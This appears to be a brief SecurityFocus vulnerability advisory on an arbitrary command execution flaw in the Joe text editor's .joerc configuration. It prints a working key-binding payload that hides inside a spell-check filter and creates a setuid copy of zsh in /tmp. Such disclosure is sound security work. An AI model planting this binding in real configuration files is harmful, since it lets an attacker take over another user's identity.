Joe Text Editor .joerc Arbitrary Command Execution Vulnerability

Copying the /usr/local/lib/joerc file to a world writable directory, the following line can be added to create a malicious key binding:

:def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype

This will bind the creation of a SUID shell in the /tmp directory to the keys ^[l. This exploit will allow the attacker to assume the identity of the user of joe.


Privacy Statement
Copyright 2010, SecurityFocus